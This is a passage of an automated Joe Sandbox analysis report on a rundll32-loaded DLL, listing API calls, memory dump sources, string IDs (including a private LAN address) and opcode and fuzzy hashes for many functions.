                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                      • String ID: System
                                                                                                                      • API String ID: 1529587224-3470857405
                                                                                                                      • Opcode ID: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction ID: 76e901679f7557a4ddbab0066ed26c1097b584537e780c29b8b672eedf99bc1e
                                                                                                                      • Opcode Fuzzy Hash: 4417374c3a9af998ac59b3fd5f055eb156b99ac3cd6379673959887b61f9b9dc
                                                                                                                      • Instruction Fuzzy Hash: CC41C275D00215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                      • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                      • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                      • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                      • API String ID: 2418878492-2500072749
                                                                                                                      • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                      • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                      • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                      • _memset.LIBCMT ref: 1001579D
                                                                                                                      • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                      • LoadBitmapA.USER32 ref: 10015807
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4271682439-3916222277
                                                                                                                      • Opcode ID: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction ID: 5c54a231f9e9e48bd6b355c1aaa1100c674665813244494f34750a8ed28325e6
                                                                                                                      • Opcode Fuzzy Hash: c2f9d16966c3e05c0f00d4b6f85f81d85042d6ca8df7dc6027e25f19a9a67901
                                                                                                                      • Instruction Fuzzy Hash: 1B31C072A00216DFEB10CF78DDCAAAE7BA5EB44645F15052AE506EF2C1EA31E9448750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                      • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                      • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2429671754-3916222277
                                                                                                                      • Opcode ID: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction ID: e2743fe1d96de1c748b152781f443ff04db9fb8b7a9177862e5f836bc5268938
                                                                                                                      • Opcode Fuzzy Hash: 0b083a6c98d2b7d8e028f34a6b6374e6a807bb31420a17051dfa8a45a9cb4bd1
                                                                                                                      • Instruction Fuzzy Hash: 5A41AD38D01289DEDB11CFE4D951ADDFBF4EF18340F20816AE945EB292EB749A44CB11
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                      • String ID: B$DISPLAY
                                                                                                                      • API String ID: 3136151823-3316187204
                                                                                                                      • Opcode ID: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction ID: a878fcb1cedf1c60654c719a4428af0d7f153658fed9e58891951680bc1a7591
                                                                                                                      • Opcode Fuzzy Hash: 01d6d3f2a82c9fc94354165a46392fa9fba4dc51678a518b48c06610c97029f8
                                                                                                                      • Instruction Fuzzy Hash: 7F119471900334EBDF11DF54AC8465A7BA8EF1A794F004061FE08AE086D270DB40CBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Edit
                                                                                                                      • API String ID: 0-554135844
                                                                                                                      • Opcode ID: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction ID: d7da207644b64a2d982eb74dcfc255ba7c8492391b78acd90f64b6ebdbaccf44
                                                                                                                      • Opcode Fuzzy Hash: aeba8321252689d607d43ce831c94e9037d76912a5b48d9cd96901cd2708aa45
                                                                                                                      • Instruction Fuzzy Hash: 5401C034B00222ABEA50DA35DC45B5AB6F9EF4E795F120524F512EE0A1DF70ECC1C666
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                      • SendMessageA.USER32 ref: 10023CD9
                                                                                                                      • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                      • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                      • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 187318432-0
                                                                                                                      • Opcode ID: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction ID: d28fad7a3843e667b269742353e4bf680cf5f7ebce9377355bc1d9e2da6f7a14
                                                                                                                      • Opcode Fuzzy Hash: 22d64082b81602bfd0fc9dbcb24da953966e1acb36a79bd38355d93537422c11
                                                                                                                      • Instruction Fuzzy Hash: 99416A38400746DFCB20DF64D845A9EB7F1FF08310F618959F9969B2A1EB74E941CB51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 69039007-0
                                                                                                                      • Opcode ID: 085ceebb537b79095729454c239c812d1055ab42ca5db445185b2e3eb14481ee
                                                                                                                      • Instruction ID: a0330575091f1317eb55619662e3d715b8734a83444e0781f194cac9bf36f8e0
                                                                                                                      • Opcode Fuzzy Hash: 085ceebb537b79095729454c239c812d1055ab42ca5db445185b2e3eb14481ee
                                                                                                                      • Instruction Fuzzy Hash: 0B21D075D0025ADFDB21CB54CC417EEB7B0EF08350F10412AED41AB290EB30AE84DBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                        • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction ID: 63e99b0baf6d5dcfdd2b5bb48b7ec33f4fcd9c2a57d1919fdecc035dbf7e745c
                                                                                                                      • Opcode Fuzzy Hash: ad45f33bd95501225e01621eadf3d29f248a2335d01e386e7c92b4ca8057da2f
                                                                                                                      • Instruction Fuzzy Hash: 2D110E71600A14EFDB21AF55CC84C0EBBE9EF89350B514829FA8597361DB31ED01CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                        • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                      • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 696222070-0
                                                                                                                      • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                      • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                      • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                      • _memset.LIBCMT ref: 10020424
                                                                                                                      • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 289641511-0
                                                                                                                      • Opcode ID: f79365a65109cbbcc9a6bbc28f9d7fd9ec1dc43e3c7e56829fb32e92ee025925
                                                                                                                      • Instruction ID: 4dbc6bba0439fa9bebd62d9ace19f6e6ac74746b4d7c1d87a51b75f8b83cd490
                                                                                                                      • Opcode Fuzzy Hash: f79365a65109cbbcc9a6bbc28f9d7fd9ec1dc43e3c7e56829fb32e92ee025925
                                                                                                                      • Instruction Fuzzy Hash: DA01DBB5600314ABE711DF64DEC4BDF77ADEF19341F404065F646D3142EAB09E448761
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                        • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                        • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                        • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                        • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                      • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                        • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                      • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                      • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2731880238-0
                                                                                                                      • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                      • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                      • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                      • SetWindowLongA.USER32 ref: 10012989
                                                                                                                        • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LongMenuWindow$AppendSystem
                                                                                                                      • String ID: 192.168.3.85$Message
                                                                                                                      • API String ID: 4121476972-856608562
                                                                                                                      • Opcode ID: a90c92772972697092915343de334961b3277e080dc7b5a44fb96fcdbf979901
                                                                                                                      • Instruction ID: 5cf2a2d3600ddfe9e3e75c53ffe40091173084dcd34b91a452ef246a626808d6
                                                                                                                      • Opcode Fuzzy Hash: a90c92772972697092915343de334961b3277e080dc7b5a44fb96fcdbf979901
                                                                                                                      • Instruction Fuzzy Hash: 12411B74A4020A9BDB04DB94CC52FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                        • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                      • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                      • _strcat.LIBCMT ref: 1001310A
                                                                                                                        • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                      • String ID: :
                                                                                                                      • API String ID: 16450322-3653984579
                                                                                                                      • Opcode ID: 9ddd6bf09d0258533da1bacb9ba6165969689cc60440b7d914755c42b9ef06e0
                                                                                                                      • Instruction ID: 3ba3dcfd2515130731a8a819d4d55e20edbbe216b941dc915dfb352fa90348a6
                                                                                                                      • Opcode Fuzzy Hash: 9ddd6bf09d0258533da1bacb9ba6165969689cc60440b7d914755c42b9ef06e0
                                                                                                                      • Instruction Fuzzy Hash: F1412CB59001189FDB28DB64CC91BEEB775FF48304F1082ADE51AAB282DF346A84CF54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                        • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
